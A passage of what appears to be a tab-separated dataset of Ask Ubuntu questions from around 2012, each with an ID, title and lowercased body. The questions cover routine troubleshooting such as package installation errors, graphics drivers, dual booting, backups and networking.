y/n ] ? y ( reading database ... 303491 files and directories currently installed . ) removing mysql-server ... setting up mysql-server-5.5 ( 5.5.28-0ubuntu0.12.04.2 ) ... start : job failed to start invoke-rc.d : initscript mysql , action `` start '' failed . dpkg : error processing mysql-server-5.5 ( -- configure ) : subprocess installed post-installation script returned error exit status 1 errors were encountered while processing : mysql-server-5.5 e : sub-process /usr/bin/dpkg returned an error code ( 1 ) i 'm especially confused with it : removing mysql-server ... setting up mysql-server-5.5 ( 5.5.28-0ubuntu0.12.04.2 ) ... start : job failed to start
217195	usb file transfer preparing to copy , but file count climbs indefinitely	i have downloaded ubuntu 12.04 to back up my windows machine that wo n't boot and am running ubuntu from the cd . i copied and pasted a volume of about 160gb to my external hdd . the transfer has been stuck in the `` preparing to copy '' stage for several hours and is displaying a file/gb count about twice as high as the volume of data actually being copied ! the number is now larger than the entire partition that 's being copied from ! however i know it 's doing something because occasionally it pops up with a minor i/o error on this or that file which i then have to click through . i 've not had this problem before so i can only assume it 's a linux/ubuntu thing . more importantly what i want to know is is there any other way to copy it across that will actually work ?
217202	i 've had installed oracle java , then i removed but the oracle java options are still in the aplications ? how do i remove them	i had troubles unistalling oracle java but finally i did it ( do n't know how ) but still the oracle java options are appearing in the dash home like oracle java console and so on . i 'd like to remove them because i do n't really have the oracle java installed anymore ( i check in synaptics software manager ) . i 'm using 12.04.1 ( ubuntu version ) .
217206	how to install ubuntu ? step by step procedure from usb stick	i want a detailed step by step procedure for installing ubuntu 12.04 from a usb stick . i have downloaded the iso file and installed ubuntu in a usb.now i want to install it completly in my system erasing the previous operating system.i want a detailed procedure for that .
217210	samsung clx-3185 installation	i 've downloaded the universal driver from samsungs website . it 's the universal driver named clx-3185 . i 've downloaded it , but i do n't know how to install this driver . does anyone know how i install this driver ? i need help ! thanks , leonard johnson
217213	how to find processed called from a specific terminal ?	i sometimes start processes in the background using the terminal . for example : $ matlab & some hours later , i can not remember which terminal i began matlab from , i.e . which terminal is not safe to close . how can i check in a terminal to see what child processes it has spawned ( if any ) ?
217215	why are the screen brightness keys on my asus n56vz not working ?	all the fn + key work except f5/f6 which control the screen brightness . how can i get them to work ?
217216	empathy 3.6 , telepathy haze , libpurple and skype - > please help me to mix them well	i 'm trying to connect skype to empathy , and here is what i have done so far . i got pidgin to display my skype contacts so skype < - > libpurple works , but empathy 3.6 does not show my skype contacts . i have both pidgin-skype and telepathy-haze installed . i suppose the problem is that empathy 3.6 gets its accounts from ubuntu online accounts , but i can not add skype there . is there any uoa plugin that adds skype support . it does not have to be based on libpurple and telepathy-haze ( in fact better if it is not ) please help . thanks .
217217	how can i get access to an external usb hard drive mounted in kde other user ?	before kubuntu 12.10 i had gentoo and in kde 's plugged devices widget i mounted devices and they were accessible by other users in other kde sessions . in kubuntu , however , my external hard disk is mounted with ownership of my user , so my wife ca n't get access to it from her kde session . is there any way for to fix this except the way to edit fstab file ?
217219	12.10 with geforce gt630 can not have driver installed	i have newly installed 12.10 ... it feels good until i tried to install the graphic driver ... i have these drivers ... model : gk107 [ geforce gt 630 ] vendor : nvidia corporation driver : nvidia-experimental-310 - distro non-free driver : nvidia-current - distro non-free recommended driver : xserver-xorg-video-nouveau - distro free builtin driver : nvidia-current-updates - distro non-free driver : nvidia-experimental-304 - distro non-free which xserver-xorg-video-nouveau can boot the system and show me desktop ... although it shows some strange pictures like mosaic ... when i installed other drivers and reboot ... system hangs on the screen below ... http : //i.stack.imgur.com/k2wvs.jpg however when this screen appears ... i can still visit the apache2 on this machine via another device ... i think that means the system not dead but just can not bring me to the graphic interface ... i ran ubuntu 11.04 before on same machine ... this situations never happen ... i am stucked here and do not know what can i do ... will any one help .. ? xrandr says below when i can see desktop ... i am not sure whether this is useful or not ... xrandr : failed to get size of gamma for output default screen 0 : minimum 2560 x 1440 , current 2560 x 1440 , maximum 2560 x 1440 default connected 2560x1440+0+0 0mm x 0mm 2560x1440 0.0* at last ... thank you for your reading ...
217220	bypass low-graphics mode 12.10 when no monitor connected	i installed ubuntu 12.10 and have set it to auto login , and have set up permissions to allow remote connections via vnc ( using the default 'desktop sharing ' application offered by ubuntu ) . everything works fine , however if i disconnect the monitor and reboot the machine it wo n't boot and login like it would otherwise . the following screen appears : https : //bugs.launchpad.net/lightdm/+bug/971891/+attachment/2991904/+files/bad-greeter.png i would like to know how to bypass this so that it would boot as if the monitor was plugged in so that i do n't have to have a monitor attached at all times .
217226	can i use amazon glacier as the backup location ?	amazon glacier storage is attractively inexpensive . is there a way to make backup use it as the backup location ?
217227	changing an ubuntu purchase to a different email	i 'll ask here , since ubuntu payment support has not replied to the email i sent two days ago . i purchased the `` the humble bundle '' currently being promoted on the ubuntu software center , paying $ 6 for it . i made the mistake of using a different email than the one linked to the software center when i registered . now , i ca n't install the bundle . and i ca n't change the email i am using to login to ubuntu software center . any ideas as to how to go about it ? thanks , justin
217229	headphone and speaker both works together in 12.10	this is the most common problem . my headphone and speakers working at the same time . i need an option to switch between my headphone and speakers or at least mute speakers when i plug the headphone . card : hda intel chip : realtek alc268 i tried lots of solution for the past 2 days . nothing worked . please help .
217230	how can i use an existing s3 bucket in backup ?	i have an existing amazon s3 bucket in the oregon region . how can i use it as the backup location in backup ? details i 've enabled the amazon s3 backup location , but i do n't see a way to specify which bucket to use . when i start backups for the first time , it automatically creates a new bucket with a name i do n't want in a region i do n't want to use .
217231	how can i use juju manage multiple environments ?	if i have multiple juju environments defined , i will often want to run a series of commands on one of them . specifying -e on every call is rather tedious , but changing the default every time you switch projects is also annoying . is there an environment variable i can set in my shell session to specify which environment all subsequent juju commands should be run against ?
217232	how do i install f-prot anti-virus without root privileges ?	how to install f-prot ( anti-virus software ) ? i 'd like a step by step answer . i 'm using ubuntu 12.04.1 . it 's a .tar.gz package .
217237	run clementine minimised and playing	i want to launch clementine every time i start my pc , and i want it to be minimised ( only tray icon ) and playing music . i added it to startup applications . what do i do next ?
217240	my ubuntu shortcuts arent persistent	i 'm running ubuntu 12.10 64 bit version . i changed the shortcuts , for moving windows to left/right/up/down workspace from shift+strg+alt+ ... to strg+super+alt+ ... and after i did so everything works how it should . but after a restart everything is just like i have n't changed anything and the shortcuts are the old ones . how to fix this issue ?
217244	why does my computer keep restarting while trying to install ubuntu ?	my compact presario cq57 is what i 'm trying to install ubuntu 12.04 on . it allows to me try ubuntu but when i try to install it alongside windows 7 , it restarts and takes me through the setup all over again and keeps restarting at that point . the laptop already has another os on it , hp quickweb , but would that affect a partitioning ? it never actually installs , it asks if i wanted to run ubuntu alongside windows or replace it , i chose alongside and then the continue button says restart and continue .
217245	how to change default paper size in 'print to file ' ?	whenever i hit my print to file : default paper size seems to be us letter : is there a way to set different default ( a4 for instance ) here ? thanks !
217246	move window from display :0.0 to display :10.0 ?	i 'm using cygwin to login to my lubuntu box : ssh -y *user* @ 192.168.12.37 i can easily use byobu to redeem my cli session . is there a way to move a running window from display :0.0 to my remote session ( :10.0 ) ? i ask because my lubuntu box is hooked to the hdtv in the living room , and i give my kids priority to do their educational stuff on the big screen . i then ( try to ) pick up where i left off on a netbook cygwin session . usually i have to quit everything and restart on the netbook .
217250	is n't my htop weird on my ubuntu server 12.04 ?	it seems i have a lot of duplicate processes ( apache ) , is it normal ? this is the output of the htop command on my ubuntu server 12.04 : thank you for your advices .
217253	how can i delete files in terminal fluently ?	for example , i do cd music dir and get 123456789.mp3 qweerkrtrkgljdjfkdjfdkf.mp3 a.mp3 b.mp3 blabla.mp3 how do i delete , say , files qweerkrtrkgljdjfkdjfdkf.mp3 and blabla.mp3 with least effort ? upd : key idea is that file names can be long so i actually dont want to type them .
217264	how do i remove window buttons and file menus from panel in 12.10 ?	i am a gnome 3 fan , but after upgrading to 12.10 i feel like i want to give unity another try . one problem that i have with unity though is the menu bars in programs and window buttons displaying in the panel . i hate this , can someone please tell me how to stop unity from doing this ? note : i found a site that explains how to stop a majority of windows from displaying the menus in the panel , but most of them still have the window buttons in the panel . i like to have my buttons on the right , but when a window is maximized , unity displays the window buttons on the left of the panel . i want to stop unity from taking control of my maximized windows .
217268	stop unity from being used in vnc sessions	if i do not want the unity launcher to be used in vnc sessions ( :2 , :3 , :4 , etc . ) is there a way to force all my vnc sessions to be gnome classic ? i log into my system ( 12.04 ) using the `` gnome classic '' display , after installing gnome3 that is . unity keeps crashing in my other vnc sessions .
217271	cant change my screen resolution	hi i have a problem with my screen resolution after installing ubuntu 12.04 i think i have the right drivers , but for some reason the resolution is way to small . it is 640 x 480 and thats the only option under `` monitors '' . how can i fix this ?
217274	can xdiagnose tools can help me with troubleshoot suspend/resume on my laptop	i 've found a tool called xdiagnose on my 12.04lts , but no documentation . i have a dell latitude laptop -- will this help me resolve suspend and resume issues that might be related to nvidia and nouveau ?
217275	can f.lux work with dual screen ( laptop + external ) setup ?	i 've been using f.lux for a while and absolutely love it . it works correctly on my laptop and also on my external screen . however , when i try to use both of them simultaneously - the magic of f.lux brightness adjustment disappears and i 'm back to default settings . is there a way to sort it out somehow ?
217276	touchscreen mouse `` locks '' on a thinkcentre 91z ?	i have a lenovo thinkcentre 91z all in one pc with amd graphics and ilitek multitouch . i am using ubuntu 12.10 and latest catalyst drivers and it seems to be working ok . i have a problem similar to the one referenced here http : //ubuntuforums.org/archive/index.php/t-2064976.html i am testing this in browsers ( chrome , chromium , firefox , opera ) but it happens elsewhere also . when i click around the screen it all seems ok for a few minutes and then the touchscreen mouse click seems to get stuck clicking ( holding ) some location and clicks anywhere else will actually select some area of screen ( like click and drag ) . this brakes a lot of functionallity , some pages are impossible to scroll afterwards etc.. everything is resolved if i log out and log in again . i do n't know anyting about the touchscreen configuration/drivers/compatibility so i dont know where to look . any ideas ?
217279	apktool error terminal inquiry	when i run apktool to build a package for android i get this output : : ~ $ apktool build '/home/ ... ' i : checking whether sources has changed ... i : checking whether resources has changed ... i : building resources ... exception in thread `` main '' brut.androlib.androlibexception : brut.common.brutexception : could not exec command : aapt , p , -f , /tmp/apktool3418222472327622786.tmp , -i , /home/apktool/framework/1.apk , -s , /home/ ... / /home/ ... /androidmanifest.xml ] at brut.androlib.res.androlibresources.aaptpackage ( androlibresources.java:255 ) at brut.androlib.androlib.buildresourcesfull ( androlib.java:324 ) at brut.androlib.androlib.buildresources ( androlib.java:269 ) at brut.androlib.androlib.build ( androlib.java:192 ) at brut.androlib.androlib.build ( androlib.java:174 ) at brut.apktool.main.cmdbuild ( main.java:188 ) at brut.apktool.main.main ( main.java:70 ) caused by : brut.common.brutexception : could not exec command : [ aapt , p , -f , /tmp/apktool3418222472327622786.tmp , -i , /home/ ... / ... /framework/1.apk , -s , /home/ ... / ... /res , -m , /home/ ... / ... /androidmanifest.xml ] at brut.util.os.exec ( os.java:87 ) at brut.androlib.res.androlibresources.aaptpackage ( androlibresources.java:253 ) ... 6 more caused by : java.io.ioexception : can not run program `` aapt '' : java.io.ioexception : error=2 , no such file or directory at java.lang.processbuilder.start ( processbuilder.java:475 ) at java.lang.runtime.exec ( runtime.java:610 ) at java.lang.runtime.exec ( runtime.java:483 ) at brut.util.os.exec ( os.java:78 ) ... 7 more caused by : java.io.ioexception : java.io.ioexception : error=2 , no such file or directory at java.lang.unixprocess . ( unixprocess.java:164 ) at java.lang.processimpl.start ( processimpl.java:81 ) at java.lang.processbuilder.start ( processbuilder.java:468 ) ... 10 more it seems like a path problem because it ca n't access aapt however my path is located in ~/pam_enviorment and is the following : path default= $ { path } : ~/myterminal path default= $ { path } : ~/myterminal/aapt any constructive feedback is welcomed .
217280	very confusing administrations and password security	i have recently suffered an annoying problem which is really bugging me at the moment . when i start ubuntu , i can login with my password perfectly fine . but when i go to terminal and use any command that requires a password , it says access unauthorised . i 'm not sure why , i have tried different commands to change the password using ctrl+alt+f1 . some managed to change the password , but the error still consists . would there be a work-around for this ? like reset the master password ? also when i login , i get prompted to enter the key password ( unsure what that is ) , but it still accepts my password
217283	`` resolving build dependencies '' makes a mess . why ?	even though i 'm currently trying to install an amd catalyst driver this is more of an universal problem with linux that i do n't get . it 's about how some packages which are totally mainstream and used all the time get tagged as `` no longer required '' by the system . for example as my amd driver installation begins i get the following message : generating package : ubuntu/precise resolving build dependencies ... unable to resolve ca n't parse dependency libobasis36-en_us-writer ca n't parse dependency libobasis36-en_us ca n't parse dependency libobasis36-en_us-res ca n't parse dependency libobasis36-en_us-math ca n't parse dependency libobasis36-en_us-calc ca n't parse dependency libobasis36-en_us-base . please manually install and try again . nonsense . these as you can see are libreoffice modules . nothing to do with amd driver . however i decided to run `` apt-get install -f '' to see what 's wrong and apparently most of my software is `` no longer required '' . apt-get install -f reading package lists ... done building dependency tree reading state information ... done the following packages were automatically installed and are no longer required : gir1.2-appindicator3-0.1 melt 9menu thunderbird-globalmenu libpurple0 liblaunchpad-integration1 libpeas-common libpanel-applet-4-0 libcogl9 python-pygoocanvas libyelp0 gir1.2-json-1.0 openshot libobasis3.6-draw libreoffice3.6-impress python-notify libtelepathy-glib0 python-mako libgtksourceview-3.0-0 libreoffice-base gir1.2-javascriptcoregtk-3.0 ratpoison xchat-common libraw5 gir1.2-gst-plugins-base-0.10 gir1.2-timezonemap-1.0 libxfce4util-bin libreoffice-calc libclutter-gst-1.0-0 gnome-video-effects libreoffice3.6-math libdiscid0 libmlt++3 libobasis3.6-impress gir1.2-gstreamer-0.10 libunique-3.0-0 qalc libobasis3.6-gnome-integration xchat thunderbird rhythmbox python-mlt3 system-config-printer-gnome gedit libgexiv2-1 libindicate-gtk3 gir1.2-soup-2.4 libgoocanvas-common libnotify-bin libminiupnpc8 librest-0.7-0 system-config-printer-udev indicator-applet libclutter-gtk-1.0-0 libevent-2.0-5 libcln6 libgpod4 gir1.2-gtksource-3.0 rhythmbox-data bodhi-openshot libreoffice-writer libobasis3.6-en-us-math avahi-utils libreoffice-draw libreoffice3.6-en-us libobasis3.6-core01 libobasis3.6-core02 libobasis3.6-core03 libobasis3.6-core04 libobasis3.6-core05 libobasis3.6-core06 libobasis3.6-core07 libxfce4util4 shotwell libcogl-common xfce-keyboard-shortcuts libdmapsharing-3.0-2 libsexy2 gedit-common rhythmbox-mozilla handbrake-cli libnice10 rhythmbox-plugin-zeitgeist libgssdp-1.0-3 libobasis3.6-en-us libobasis3.6-math simple-scan gir1.2-webkit-3.0 libpeas-1.0-0 libxfce4util-common indicator-messages python-markupsafe libmp3lame0 libreoffice3.6-base rhythmbox-plugin-cdrecorder libqalculate5 python-imaging librhythmbox-core5 handbrake-gtk gnuplot-x11 bodhi-vlc libreoffice3.6-calc bodhi-rhythmbox libclutter-1.0-0 python-smbc gnuplot-nox libcogl-pango0 bodhi-handbrake libcluttergesture-0.0.2-0 bodhi-printing indicator-status-provider-mc5 libpython2.7 system-config-printer-common libreoffice3.6-writer libgtksourceview-3.0-common libtimezonemap1 media-player-info gnome-user-guide libjson-glib-1.0-0 libxfce4ui-1-0 libreoffice-impress libmx-1.0-2 gir1.2-xkl-1.0 libsox-fmt-base libgpod-common python-gnomekeyring rhythmbox-plugins libclutter-1.0-common libido3-0.1-0 tcl8.5 gstreamer0.10-nice libobasis3.6-en-us-base yelp gir1.2-rb-3.0 python-cups libgupnp-1.0-4 libsox-fmt-alsa libexo-1-0 libreoffice-math libpurple-bin libobasis3.6-en-us-calc libreoffice3.6-draw libxklavier16 libreoffice libmeanwhile1 indicator-sound libobasis3.6-base libindicate5 filelight libzephyr4 qalculate-gtk libobasis3.6-calc libreoffice3.6-ure libgtkspell0 libopencore-amrnb0 yelp-xsl libobasis3.6-en-us-res xfconf libsox1b libquicktime2 libmlt-data libreoffice3.6 xfburn openshot-doc libxfconf-0-2 python-cupshelpers libclutter-imcontext-0.1-0 libobasis3.6-writer libobasis3.6-en-us-writer libobasis3.6-images libexo-common libfarstream-0.1-0 libgoocanvas3 libobasis3.6-ooolinguistic libgupnp-igd-1.0-4 libopencore-amrwb0 python-httplib2 gir1.2-peas-1.0 libmlt4 libneon27-gnutls libindicator-messages-status-provider1 libexo-helpers libmusicbrainz3-6 libavdevice53 use 'apt-get autoremove ' to remove them . 0 upgraded , 0 newly installed , 0 to remove and 117 not upgraded . i 've no idea why this is happening . it happened to me before while installing other applications such as wine . please explain . i 'm new to linux unfortunately .
217284	gnome / unity not meant to be customized ?	i was originally planning to ask if there was an easy gui-friendly way of installing new themes on gnome/unity , but ... i 've been reading some blogs recently that seem to indicate that gnome and unity are meant to not be customizable : ( e.g . this thread on hacker news and the associated article ) . is this true ? i 'm trying to ascertain if its worth time to customize ubuntu guis , whether in gnome or unity .
217288	unity problems after changing graphic card drivers	the fan of my graphic card is very loud . i tried to install additional drivers for it . after rebooting my pc - to apply changes - unity wo n't show ... if i change the driver back to default unity shows up again after restart . graphic card : geforce 9600 gt
217293	how to force dhclient to run ?	i usually run with eth0 config 'd statically from info in /etc/network/interfaces , but sometimes need to use a dhcp acquired config . running dhclient just tells me it 's now an upstart job and suggests running reload , but reload dhclient responds 'unknown job : dhclient . ' how can i make it run ?
217296	ubuntu 12.10 dual boot windows 7 not working	when i install ubuntu , and the computer restarts it does n't show the boot managaer so it always boots in windows 7 . i tried to change the default os , and ubuntu was n't even listed in it . then i read a how to on it , it showed how to size the partions and make them correctly , but it still did n't work . i tried easybcd and still no success . i 've tried installing it about 4-5 times and i still ca n't get it . what can i do to fix it ?
217297	extension glx missing ... on a desktop pc	i just installed ubuntu 12.10 on a new pc with an nvidia gtx 560 graphics card , but after installing the nvidia proprietary drivers ( either -current or -current-updates ) , unity wo n't start . when trying to start it manually i get the message `` extension glx missing '' . i 've searched around and found results like this question which point out it 's a problem with nvidia optimus laptops . however , i do n't have this problem on a laptop , but on a desktop pc . update : it seems that optimus is now available for desktops under the name 'synergy ' . note that if that 's the case here , i 'm just looking for a way to get my main gpu working in ubuntu , and having the switching capability is a low priority . lshw output for the graphics card : *-display description : vga compatible controller product : gf114 [ geforce gtx 560 se ] vendor : nvidia corporation physical id : 0 bus info : pci @ 0000:01:00.0 version : a1 width : 64 bits clock : 33mhz capabilities : pm msi pciexpress vga_controller bus_master cap_list rom configuration : driver=nouveau latency=0 resources : irq:16 memory : f4000000-f5ffffff memory : e0000000-e7ffffff memory : e8000000-ebffffff ioport : e000 ( size=128 ) memory : f6000000-f607ffff and cpu : *-cpu description : cpu product : intel ( r ) core ( tm ) i5-3570k cpu @ 3.40ghz vendor : intel corp. physical id : 40 bus info : cpu @ 0 version : intel ( r ) core ( tm ) i5-3570k cpu @ 3.40ghz slot : socket 0 size : 1600mhz capacity : 3800mhz width : 64 bits clock : 100mhz capabilities : x86-64 fpu fpu_exception wp vme de pse tsc msr pae mce cx8 apic sep mtrr pge mca cmov pat pse36 clflush dts acpi mmx fxsr sse sse2 ss ht tm pbe syscall nx rdtscp constant_tsc arch_perfmon pebs bts rep_good nopl xtopology nonstop_tsc aperfmperf pni pclmulqdq dtes64 monitor ds_cpl vmx est tm2 ssse3 cx16 xtpr pdcm pcid sse4_1 sse4_2 popcnt tsc_deadline_timer aes xsave avx f16c rdrand lahf_lm ida arat epb xsaveopt pln pts dtherm tpr_shadow vnmi flexpriority ept vpid fsgsbase smep erms cpufreq configuration : cores=4 enabledcores=4 threads=4
217303	setup dns server for local network ( with dhcp ) for use with apache	i 've set up an ubuntu-server to host a website . but at first i want to configure it to work in my local network . actually it serves as dhcp server for the whole network with static ip 192.168.170.250 ( and configured , but not accessable hostname `` ubuntu-server '' ) and now i want to access this server ( and all the apache virtual-hosts ) via hostnames . i already tried to install and configure a dns server on this machine but without success ... ( those tutorials did n't work for me : tutorial 1 and tutorial 2 ) also read other questions like this and that but the first one is a complete different question and the other is confusing me because i do n't understand the impact of the differences to the first mentioned tutorials ... ( and i would really prefer to understand what i 'm doing and configurating ... ) i just want to write something like `` ubuntu-server.home.lan '' on any pc in my network to access my ubuntu-server , or `` website1.home.lan '' to access a virtual host of apache running on my ubuntu-server . and maybe later register this server to an official domain to make it accessible from web ... i would be glad for every hint !
217306	how do i update drracket ?	i installed drracket with the software center , but it only installs the verion 5.2.1 . i downloaded the installer from the website http : //racket-lang.org/download/ i just started using ubuntu ... and after a bit of searching i found out how to install .sh files : first : chmod +x filename.sh second : ./filename.sh then the terminal asks me if i want to install the unix-style distribution , i type in yes . after this the terminal says : where do you want to base your installation of racket v5.3.1 ? ( if you 've done such an installation in the past , either enter the same directory , or run 'racket-uninstall ' manually . ) 1 - /usr/ ... [ default ] 2 - /usr/local/ ... 3 - ~/ ... ( /home/julian-b/ ... ) 4 - ./ ... ( here ) or enter a different directory prefix to install in . i choose the default one ( 1 ) and i get the following ... error : the entered base directory is not writable : /usr how do i make my filesystem or /usr writable ?
217309	how does process priority influence a process	assuming we have read the following question : change niceness ( priority ) of a running process and we know about root , non-root permissions : what actually happens when a running process ( through renice ) or a new process ( through nice ) gets its priority changed to a positive/negative value it previously had . does it mean more memory is assign to it ? does more cpu power go to that particular process ? does it reduce any timing for resources for that process ? what happens when the process priority change ?
217311	why do i get a `` file too big '' error when i transfer files to an external hard drive that has plenty of room ?	i am digitizing my video collection and want to put it on an external hard drive . it is a 1tb western digital hd . the files are all over 5gb as i am ripping the files with handbrake and at a very high quality . i use the copy/paste method of transferring them to the hd and when it hits a certain size , it errors and stops the transfer telling me that the file is too big . there is plenty of space on the hd . any suggestions would be appreciated ! thanks . i am running ubuntu 12.04 on a dell latitude e6400 32bit .
217312	will my linksys ae2500 run on ubuntu 12 ?	i have a linksys ae2500 made by cisco and was wondering if it will work/ run with no `` hiccups '' .
217313	my laptop shuts down when i remove the charger	my laptop shuts down when the charger is removed . additionally , i get a message when booting up saying disk drive for /media/3936-3939 is not ready or not present . about a week ago i was trying to install a matlab iso file using mount commands etc ... i tried mount , fuseiso , and unetbootin . i have a feeling this may have something to do with message i 'm getting from booting up . if anyone can point me in the right direction or help me out .
217315	why did sticky edges option disappear ?	i upgraded from ubuntu 11.10 to 12.04 and as soon as i did , my sticky edges option was gone . i ca n't snap windows to the sides of my screen anymore and it 's honestly really annoying . lol does anyone have a fix for this ?
217316	how can i prevent accidental execution of the rm -r *command ?	occasionally i use command to delete some files . for example , the name might start with 'a ' , so i 'll delete with the command rm -r a* , but i do n't want to remove some other directory by accident . how can i lock a directory to prevent deletion by rm -r ?
217317	what is the difference between vagrant and juju ?	are they both solving the same problem ? or are they for two different sets of problems ? if so for what i it better to use vagrant , and for what better to use juju ?
217326	fullscreen still has taskbars at top and bottom	i 'm using ubuntu 12.04 and running the gnome classic desktop . whenever i go fullscreen , the taskbars at the top and bottom which hold the menus , notifications , etc . are still visible . this only happens when i 'm in a browser or trying to play a game . i 've tried it in both firefox and chromium , and get the same result no matter which one i use . videos i watch using vlc however do not have the bars at the top and bottom . i found only one post about this in the questions , but there were no answers that worked for me . i was n't sure if commenting my problem into the 5 month old post would move it to the top where it could be seen , so i made this one .
217327	internal mic not working on dell adamo 13	so i 'm using elementary luna beta ( based on ubuntu 12.04 lts ) on a spare hdd after successfully using jupiter release ( based on 10.10 ) for many years . in jupiter i had my internal mic work out of the box and with skype installed from deb it was all setup without having to step foot inside the terminal . in luna beta the internal mic is not recognised by the os and so also not recognised by skype . i believe the hardware is this ( from sudo lshw ) : *-multimedia description : audio device product : 82801i ( ich9 family ) hd audio controller vendor : intel corporation physical id : 1b bus info : pci @ 0000:00:1b.0 version : 03 width : 64 bits clock : 33mhz capabilities : pm msi pciexpress bus_master cap_list configuration : driver=hda intel latency=0 resources : irq:46 memory : f8600000-f8603fff as well as this i ran cat /proc/asound/card0/codec* | grep codec , which gave me : codec : idt 92hd73c1x5 codec : intel cantiga hdmi how do i tweak luna to get this hardware working properly ? i 'm able to switch out my luna hdd with the jupiter hdd to help troubleshoot what the differences are between the two and why the more recent os ca n't find / use the mic correctly . thanks in advance for any help you can give .
217331	where are the .desktop icon files stored ?	what system folder on ubuntu 12.10 are the main menu .desktop icons stored at ? ? ? i am having trouble locating ... .
217343	virtual box disk image can not be read	i have a great problem to deal : no access to ubuntu through my virtualbox . i always have the same error message : session failed to open could not open the medium '/users/me/virtualbox vms/ubuntu/ubuntu.vdi ' . vdi : error reading pre-header in '/users/me/virtualbox vms/ubuntu/ubuntu.vdi ' ( verr_dev_io_error ) . vd : error verr_vd_vdi_invalid_header opening image file '/users/me/virtualbox vms/ubuntu/ubuntu.vdi ' ( verr_vd_vdi_invalid_header ) . code d'erreur : ns_error_failure ( 0x80004005 ) composant : medium interface : imedium { 53f9cc0c-e0fd-40a5-a404-a7a5272082cd } i tried to follow a guide on how to mount a vdi file . but i ca n't open my 6 gb sized file not even with hexfiend , or with 0exed . how do i repair the pre-header ?
217344	ubuntu software center only opens for a few seconds , then crashes ?	so i 've been googling this question all day , and i 've tried everything . i 've tried uninstalling and reinstalling usc multiple times , i 've tried basically all of the terminal commands that these forums/ask boards have recommended , to no avail . i 'm at a loss . i 'm using ubuntu 12.04 : o edit// i should probably be more specific about my problem ! ahah . everytime i try to open usc , the frame and everything will show up & it 'll load for about 5 seconds , then it 'll turn gray & i 'll have to force quit it : i
217345	unable to remove network proxy	i 'd set up a network proxy a couple of days back from system settings . and afterwards i 'd set my proxy method back to none . however , my proxy has not been removed . i know this because : 127.0.0.1 routes me to the index.html file in the base directory of the proxy server . i 'm able to access my university internet after hours . i checked my /etc/environment and /etc/apt/apt.conf file and both of them have no proxy details . i also tried resetting the proxy and then getting rid of it but that did n't work either .
217346	why skype and fogger are not available in 12.10 software center ?	why neither skype nor fogger are available in 12.10 software center ? even after i enabled canonical partners ' sources in software sources . edit : the fogger is still not available via sc even though it 's available via web version of sc fogger for ubuntu i perfer not to use terminal .
217348	browser redirection	i am always getting redirecting to this http : //search.tedata.net tedata is my internet provider . i called them they say they ca n't help unless i have windows but i do n't want to go back to windows i tried rootkit hunter but it did n't work either i do n't know what is wrong , how could this keep coming up even after formatting my hard ? is it possible that the ubuntu version i have downloaded from the website is defective , the problem did n't appear with linux mint or xubuntu it only appeared when i replaced unity with cinnamon but now it appears right away after clean installation of ubuntu 12.04
217352	how to upload a scons project to a ppa ?	my question is just what the title suggests . there does n't seem to be a way to upload builds to a ppa which have been build by the scons build system , but pretty much only traditional makefile projects . if someone knows a way how to do this , or at least how to upload a precompiled deb file , please let me know .
217357	multiple ips for a single wireless nic	i would like to have both a static ip or two ( different locally routable subnets ) and a dhcp virtual interface on a single physical wireless nic . any suggestion on how to address that ? ubuntu 12.04lts , lenovo t61 tia !
217358	how can i display eth0 's ip address at the login screen on precise server ?	the server i administrate , inconveniently enough , has a dynamic ip address assigned by dhcp . the convenient counterbalance , though , is that it happens to be set up about two feet from where i sit . i know how to edit /etc/issue to show different values before the login prompt is delivered to the display , but i 'd like to know if it 's possible for /etc/issue to display the current ip address of eth0 ( re-evaluated at boot time ) so that i can see it and then ssh in without having to log in to run ifconfig .
217359	what information i need to add to get the bug noticed ?	i filled the bug to launchpad about gedit . https : //bugs.launchpad.net/ubuntu/+source/gedit/+bug/1067915 what information i need to add , maybe some tests . maybe i need to fill the bug to upstream ? the bug is not critical , but i want to know also how to make sure that any my reported bug will not hung without activity for many months , or even years . because , there are such examples ...
217361	how do i install drivers for the atheros ar8161 ethernet controller on 64-bit 12.10 using an internet-connected 32-bit 12.04 pc and a usb flash drive ?	how do i install drivers for the atheros ar8161 ethernet controller on 64-bit 12.10 using an internet-connected 32-bit 12.04 pc and a usb flash drive ? having bought a new hp elite desktop pc and installed 64-bit ubuntu 12.10 i 've found it unable to connect to network thanks to its atheros ar8161 ethernet controller . there are no pci slots in the pc to use an old pci nic . i have got no usb nics or smartphones to use for temporary internet connection . all i can use is a laptop with working internet connection running 32-bit xubuntu 12.04 and a usb flash drive to copy files between the pcs . as far as i understand i will have to build a 64-bit 3.5.0-17 version of the alx module on a 32-bit 3.2.0-32 system and install it on the target machine , but i hardly have any idea on how to do that : - ( here is a closely related question .
217362	unable to install libcairo2 : i386 on ubutu 12.10 x86_64	i get the following error . i think it is a bug . is there a workaround ? there is mismatch between the 32 and 64 bit version of this package . apt-get install libcairo2 : i386 reading package lists ... done building dependency tree reading state information ... done some packages could not be installed . this may mean that you have requested an impossible situation or if you are using the unstable distribution that some required packages have not yet been created or been moved out of incoming . the following information may help to resolve the situation : the following packages have unmet dependencies : libatk-wrapper-java-jni : depends : libgtk2.0-0 ( > = 2.12.0 ) but it is not going to be installed depends : libatk-wrapper-java ( > = 0.30.4-0ubuntu4 ) but it is not going to be installed e : error , pkgproblemresolver : :resolve generated breaks , this may be caused by held packages .
217364	does ubuntu 12.10 support asix ax88772 ethernet controller chip out-of-the-box ?	being stuck with this question i am choosing a usb ethernet adapter to buy to work it around . obviously i need an adapter for which ubuntu has drivers built-in . so the question is if axago ade-x5 usb said to be based on the asix ax88772 chip is going to work . it is said to support linux but that does n't necessarily mean the driver is actually built in to the distribution .
217365	what can i use to download youtube videos ?	with windows , there are a couple programs to download video from youtube . does anyone know of any free software that will do this on ubuntu ?
217368	my ubuntu 12.10 does not startup to gui	when i switch on my laptop and chose ubuntu to start it up . i am stuck with console only asking me for my username then for my password . i do not know what had happened to my ubuntu , last thing i remember is using ubuntu tweak , bleach , bleach ( root ) . after that i could not start an log in to the gdm .
217372	network problem only when using browser	i have a laptop running ubuntu 12.04 . everything used to work perfectly but currently i am having network problem . if i restart network-manager , i could ping my router and google.com no problem , bittorrent still works . once i open a browser and load a website , the laptop network will no longer work . i ca n't even ping my router anymore . i need to restart network-manager then i can ping again . nevertheless , the problem will happen again when i load a website . any idea what is causing this problem ?
